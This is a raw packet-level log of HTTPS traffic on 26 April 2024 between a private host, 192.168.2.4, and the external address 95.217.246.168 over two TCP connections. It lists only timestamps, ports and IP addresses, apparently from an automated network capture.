Apr 26, 2024 11:03:10.647136927 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.647170067 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.647186995 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.647233963 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.647233963 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.685856104 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.685900927 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.685937881 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.685951948 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.685980082 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.685998917 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.718626976 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.718669891 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.718719006 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.718733072 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.718758106 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.718775034 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.750370026 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.750417948 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.750437975 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.750458956 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.750488043 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.750502110 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.775834084 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.775882006 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.775902987 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.775927067 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.775953054 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.775970936 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.804775953 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.804820061 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.804850101 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.804862976 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.804893017 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.804908991 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.837143898 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.837188959 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.837229967 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.837244034 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.837268114 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.837285995 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.849164963 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.849210024 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.849241018 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.849253893 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.849280119 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.849314928 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.867126942 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.867172003 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.867211103 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.867223978 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.867252111 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.867269993 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.886416912 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.886460066 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.886524916 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.886538982 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.886586905 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.886586905 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.908305883 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.908350945 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.908386946 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.908400059 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.908428907 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.908447981 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.930085897 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.930135965 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.930176020 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.930187941 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.930219889 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.930238008 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.953361034 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.953406096 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.953468084 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.953480959 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.953516960 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.953536034 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.959500074 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.959542036 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.959584951 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.959597111 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.959624052 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.959642887 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.977760077 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.977803946 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.977844954 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.977858067 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.977897882 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.977897882 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.992780924 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.992830038 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.992881060 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.992897987 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:10.992928028 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:10.992944002 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.009613991 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.009673119 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.009691954 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.009710073 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.009735107 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.009769917 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.024808884 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.024847984 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.024899006 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.024913073 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.024945021 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.024981022 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.037929058 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.037976980 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.038044930 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.038044930 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.038059950 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.038117886 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.051018953 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.051067114 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.051115036 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.051129103 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.051182985 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.051182985 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.065439939 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.065481901 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.065514088 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.065526962 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.065556049 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.065577030 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.079663038 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.079705000 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.079741001 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.079756975 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.079781055 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.079801083 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.094971895 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.095015049 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.095053911 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.095068932 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.095098972 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.095318079 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.108604908 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.108644962 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.108683109 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.108695984 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.108722925 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.108741999 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.119080067 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.119137049 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.119168043 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.119179964 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.119206905 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.119221926 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.129874945 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.129919052 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.129961014 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.129972935 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.130001068 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.130023003 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.140235901 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.140278101 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.140311956 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.140325069 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.140352011 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.140366077 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.150593996 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.150638103 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.150676012 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.150693893 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.150736094 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.150753975 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.160401106 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.160446882 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.160484076 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.160496950 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.160522938 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.163091898 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.169131041 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.169173956 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.169205904 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.169219017 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.169244051 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.169262886 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.179212093 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.179255962 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.179300070 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.179313898 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.179352045 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.183078051 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.187592983 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.187635899 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.187669039 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.187686920 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.187711954 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.187731981 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.194771051 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.194832087 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.194864035 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.194878101 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.194920063 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.194920063 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.194986105 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.195033073 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.245122910 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.245156050 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.291179895 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.291244984 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.291353941 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.291563988 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.291579962 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.833375931 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.833482027 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.833916903 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.833945036 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:11.834076881 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:11.834089041 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:12.683617115 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:12.683679104 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:12.683717966 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:12.683722973 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:12.683793068 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:12.683793068 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:12.683828115 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:12.683891058 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:12.805279016 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:12.805357933 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:12.805397987 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:12.805423975 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:12.805550098 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:12.805572987 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:12.988990068 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:12.989038944 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:12.989103079 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:12.989136934 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:12.989167929 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:12.989624023 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.100044012 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.100090027 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.100152016 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.100172997 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.100202084 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.100236893 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.196269989 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.196315050 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.196340084 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.196357012 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.196388006 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.196439028 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.265849113 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.265942097 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.265960932 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.266016006 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.266051054 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.266932011 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.311547041 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.311593056 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.311752081 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.311774969 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.311923027 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.369847059 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.369894028 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.369951963 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.369976997 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.370002985 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.370969057 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.421418905 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.421473026 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.421649933 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.421649933 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.421711922 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.423929930 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.469530106 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.469578981 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.469726086 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.469726086 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.469789982 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.469841003 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.508903027 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.508948088 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.508981943 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.508999109 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.509030104 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.509068966 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.542144060 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.542188883 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.542228937 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.542258978 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.542280912 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.542310953 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.573647022 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.573689938 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.573734045 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.573798895 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.573834896 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.573858023 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.598875999 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.598926067 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.598978996 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.598978996 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.598998070 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.599057913 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.622454882 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.622545958 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.622567892 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.622584105 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.622621059 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.622622013 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.648313046 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.648338079 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.648396015 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.648413897 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.648444891 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.648634911 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.668900967 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.668925047 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.668983936 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.669004917 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.669038057 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.669080973 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.692568064 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.692608118 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.692658901 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.692679882 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.692708015 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.692821026 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.711992025 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.712034941 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.712068081 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.712081909 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.712129116 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.712248087 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.733433008 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.733478069 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.733513117 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.733525991 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:13.733555079 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:13.733733892 CEST	49744	443	192.168.2.4	95.217.246.168
